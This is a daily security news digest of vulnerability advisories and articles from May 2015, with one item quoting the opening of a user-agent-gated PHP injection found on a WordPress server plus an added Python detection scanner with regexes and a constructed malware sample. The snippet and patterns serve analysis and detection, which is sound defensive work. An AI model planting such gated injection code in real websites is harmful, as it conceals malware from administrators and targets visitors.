Daily summary - Wednesday 27-05-2015

End-of-Shift report

Timeframe: Tuesday 26-05-2015 18:00 - Wednesday 27-05-2015 18:00
Handler: Stephan Richter
Co-Handler: n/a

This is not the UEFI backdoor you are looking for

This is currently the top story on the Linux subreddit. It links to this Tweet, which demonstrates using a System Management Mode backdoor to perform privilege escalation under Linux. This is not a story. But first, some background. System Management Mode (SMM) is a feature in most x86 processors since the 386SL back in 1990. It allows certain events to cause the CPU to stop executing the OS, jump to an area of hidden RAM and execute code there instead, and then hand off back to the OS...

http://mjg59.dreamwidth.org/35110.html


Breach detection: Five fatal flaws and how to avoid them

When the Sarbanes-Oxley Act of 2002 was passed, it fell on corporate security teams to translate its requirements into technical controls. That threw the IT Security function into the deep end of the ...

http://feedproxy.google.com/~r/HelpNetSecurity/~3/uoHRSOyKltE/article.php


Five Mistakes MSSPs Should Avoid

MSSPs, or Managed Security Service Providers, are at an exciting point where market acceptance, awareness and demand have converged. I view this as a positive for a potential MSSP but also for the customers and businesses they will protect, enhancing security for everyone. However, excitement and the prospect of profits can create haste, and with haste comes an increased risk of mistakes. In my role at AlienVault, I've been fortunate enough to work with and help ensure the success of a number of...

https://www.alienvault.com/blogs/security-essentials/five-mistakes-mssps-should-avoid


Over 30% of Official Images in Docker Hub Contain High Priority Security Vulnerabilities

Docker Hub is a central repository for Docker developers to pull and push container images. We performed a detailed study on Docker Hub images to understand how vulnerable they are to security threats. Surprisingly, we found that more than 30% of official repositories contain images that are highly susceptible to a variety of security attacks (e.g., Shellshock, Heartbleed, Poodle, etc.). For general images...

http://www.banyanops.com/blog/analyzing-docker-hub/


Patch now: Synology NAS attackable via photo album

Synology's web photo album Photo Station unintentionally grants attackers access to DiskStation NAS systems. Anyone who does not want strangers executing arbitrary code on their NAS should install the vendor's patch now.

http://heise.de/-2668853


How to Prevent a Domain Name Theft

1. Introduction Domain names may cost far more than real estate. For instance, Facebook paid USD 8.5 million to buy fb.com. The high prices of domain names attract not only businesses, but also thieves. Domain name theft can be huge trouble for companies because it affects their brand and reputation. This...

http://resources.infosecinstitute.com/how-to-prevent-a-domain-name-theft/


SQL injection vulnerability in xt:Commerce

Security updates close a hole in the shop software through which attackers could potentially inject database commands.

http://heise.de/-2667569


Possible Wordpress Botnet C&C: errorcontent.com, (Tue, May 26th)

Thanks to one of our readers for sending us this snippet of PHP he found on a WordPress server (I added some line breaks and comments in red for readability):

    #2b8008#
    /* turn off error reporting */
    @error_reporting(0);
    /* do not display errors to the user */
    @ini_set('display_errors', 0);
    $wp_mezd8610 = @$_SERVER['HTTP_USER_AGENT'];
    /* only run the code if this is Chrome or IE and not a bot */
    if (( preg_match ('/Gecko|MSIE/i', $wp_mezd8610) && !preg_match ('/bot/i', $wp_mezd8610))) {

https://isc.sans.edu/diary.html?storyid=19733&rss
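The gating pattern in the snippet above (a throw-away hex marker comment, error suppression, a Gecko/MSIE user-agent check, a bot exclusion and a random-looking $wp_xxxxNNNN variable) is easy to look for across a WordPress tree. The scanner below is an added example written for this digest, not code from the ISC diary or from the reader who submitted the snippet; the indicator names, the threshold of three indicators and both PHP samples are constructed for illustration and are assumptions, not signatures published anywhere.

```python
"""Heuristic scanner for user-agent-gated PHP injections.

Looks for the traits seen in the ISC snippet: a '#xxxxxx#' marker, error
suppression, a Gecko|MSIE user-agent gate, a '!preg_match(/bot/i)' exclusion,
a read of HTTP_USER_AGENT and a '$wp_<letters><digits>' variable name.
Indicator names and the threshold are this example's own choices.
"""
import re
from pathlib import Path
from typing import Dict, List

# (name, pattern) pairs; each one fires independently and is counted once.
INDICATORS = [
    ("hex_marker", re.compile(r"#[0-9a-f]{6}#")),
    ("error_suppression", re.compile(
        r"@?error_reporting\(\s*0\s*\)"
        r"|@?ini_set\(\s*['\"]display_errors['\"]\s*,\s*0\s*\)")),
    ("ua_gating", re.compile(r"preg_match\s*\(\s*['\"]/Gecko\|MSIE/i['\"]")),
    ("bot_exclusion", re.compile(r"!\s*preg_match\s*\(\s*['\"]/bot/i['\"]")),
    ("user_agent_read", re.compile(r"\$_SERVER\[\s*['\"]HTTP_USER_AGENT['\"]\s*\]")),
    # letters followed by digits, e.g. $wp_mezd8610; real WP globals such as
    # $wp_query or $wp_settings contain no digits and therefore do not match.
    ("random_wp_var", re.compile(r"\$wp_[a-z]{2,6}\d{3,6}\b")),
]

SUSPICIOUS_THRESHOLD = 3  # assumption: three independent traits is a hit


def find_indicators(php_source: str) -> List[str]:
    """Return the names of all indicators present in one PHP source text."""
    return [name for name, rx in INDICATORS if rx.search(php_source)]


def is_suspicious(php_source: str, threshold: int = SUSPICIOUS_THRESHOLD) -> bool:
    """True when at least `threshold` distinct indicators are present."""
    return len(find_indicators(php_source)) >= threshold


def scan_tree(root: Path, threshold: int = SUSPICIOUS_THRESHOLD) -> Dict[str, List[str]]:
    """Walk a directory of .php files and map each suspicious path to its hits."""
    hits: Dict[str, List[str]] = {}
    for path in root.rglob("*.php"):
        try:
            source = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the whole scan
        found = find_indicators(source)
        if len(found) >= threshold:
            hits[str(path)] = found
    return hits


# Constructed sample reproducing the traits of the reader-submitted snippet;
# the payload fetch itself is intentionally left out.
INJECTED_SAMPLE = r"""<?php
#2b8008#
@error_reporting(0);
@ini_set('display_errors', 0);
$wp_mezd8610 = @$_SERVER['HTTP_USER_AGENT'];
if ((preg_match('/Gecko|MSIE/i', $wp_mezd8610) && !preg_match('/bot/i', $wp_mezd8610))) {
    /* payload would be fetched and eval()'d here */
}
"""

# Constructed benign sample: a legitimate user-agent check should not trigger.
BENIGN_SAMPLE = r"""<?php
$wp_settings = get_option('my_settings');
if (preg_match('/bot/i', $_SERVER['HTTP_USER_AGENT'])) {
    header('X-Robots-Tag: noindex');
}
"""

if __name__ == "__main__":
    print("injected:", find_indicators(INJECTED_SAMPLE))
    print("benign:  ", find_indicators(BENIGN_SAMPLE))
    print("suspicious?", is_suspicious(INJECTED_SAMPLE), is_suspicious(BENIGN_SAMPLE))
```

Run it against a site with `scan_tree(Path("/var/www/html"))`; a single indicator such as a user-agent read is normal in themes and plugins, which is why the verdict needs several traits at once, and any hit still has to be read by a human before anything is deleted.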


Researchers Exploit Patched Windows Group Policy Bug

Researchers from Core Security were able to exploit a security vulnerability in Windows group policy -- MS15-011 -- that was patched by Microsoft in February.

http://threatpost.com/researchers-exploit-patched-windows-group-policy-bug/113000


Online service builds custom crypto-trojans

The entry barrier for aspiring online extortionists has dropped again: a service on the Tor network builds a customised ransomware trojan in a few clicks. If a victim pays the ransom demanded, the operators take a cut.

http://heise.de/-2668860


Security: two new exploits against routers discovered

Insecure routers are currently threatened by two versions of malware at once. One distributes spam via social media, the other redirects requests to manipulated websites. (Router, Virus)

http://www.golem.de/news/security-zwei-neue-exploits-auf-router-entdeckt-1505-114294-rss.html


extjs Arbitrary File Read / ssrf Vulnerability

Topic: extjs Arbitrary File Read / ssrf Vulnerability Risk: High Text: Hi all: Baidu Security Team found a vulnerability in extjs; with this vulnerability we can read arbitrary files and request...

http://cxsecurity.com/issue/WLB-2015050162


USN-2622-1: OpenLDAP vulnerabilities

Ubuntu Security Notice USN-2622-1, 26th May 2015: openldap vulnerabilities. A security issue affects these releases of Ubuntu and its derivatives: Ubuntu 15.04, Ubuntu 14.10, Ubuntu 14.04 LTS, Ubuntu 12.04 LTS. Summary: OpenLDAP could be made to crash if it received specially crafted network traffic. Software description: openldap - OpenLDAP utilities. Details: It was discovered that OpenLDAP incorrectly handled certain search queries that returned empty attributes. A remote attacker could use this issue to cause...

http://www.ubuntu.com/usn/usn-2622-1/


Cisco IP Phone 7861 Denial of Service Vulnerability

http://tools.cisco.com/security/center/viewAlert.x?alertId=39011


ZDI-15-240: Dell NetVault Backup Heap Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Dell NetVault Backup. Authentication is not required to exploit this vulnerability.

http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/y6osEWmyti0/


ZDI-15-244: Arcserve Unified Data Protection Management Service EdgeServiceImpl getBackupPolicies Information Disclosure Vulnerability

This vulnerability allows remote attackers to disclose information on vulnerable installations of Arcserve Unified Data Protection. Authentication is not required to exploit this vulnerability.

http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/NFGleCbsATc/


ZDI-15-243: Arcserve Unified Data Protection Management Service EdgeServiceImpl getBackupPolicy Information Disclosure Vulnerability

This vulnerability allows remote attackers to disclose information on vulnerable installations of Arcserve Unified Data Protection. Authentication is not required to exploit this vulnerability.

http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/OV8j2fD9GSM/


ZDI-15-242: Arcserve Unified Data Protection Management Service exportServlet Directory Traversal Information Disclosure and Denial of Service Vulnerability

This vulnerability allows remote attackers to disclose and delete files on vulnerable installations of Arcserve Unified Data Protection. Authentication is not required to exploit this vulnerability.

http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/CxxqPV5u-0s/


ZDI-15-241: Arcserve Unified Data Protection Management Service reportFileServlet Directory Traversal Information Disclosure and Denial of Service Vulnerability

This vulnerability allows remote attackers to disclose and delete files on vulnerable installations of Arcserve Unified Data Protection. Authentication is not required to exploit this vulnerability.

http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/MNmtjnSQ_b4/


SAP NetWeaver XML External Entity Processing Flaw Lets Remote Users Obtain Potentially Sensitive Information

http://www.securitytracker.com/id/1032402


Security Advisory: Point-to-Point Protocol (PPP) vulnerability CVE-2015-3310

(SOL16686)

https://support.f5.com:443/kb/en-us/solutions/public/16000/600/sol16686.html?ref=rss


lighttpd Input Validation Flaw Lets Remote Users Inject Log File Entries

http://www.securitytracker.com/id/1032405


Rockwell Automation RSView32 Weak Encryption Algorithm on Passwords

This advisory was originally posted to the US-CERT secure Portal library on May 12, 2015, and is being released to the NCCIC/ICS-CERT web site. This advisory provides mitigation details for a password encryption vulnerability in RSView32.

https://ics-cert.us-cert.gov/advisories/ICSA-15-132-02


Thycotic Password Manager Secret Server iOS Application MITM

Topic: Thycotic Password Manager Secret Server iOS Application MITM Risk: Medium Text: Thycotic Password Manager Secret Server iOS Application - MITM SSL Certificate Vulnerability -- http://www.info-sec.ca/adviso...

http://cxsecurity.com/issue/WLB-2015050167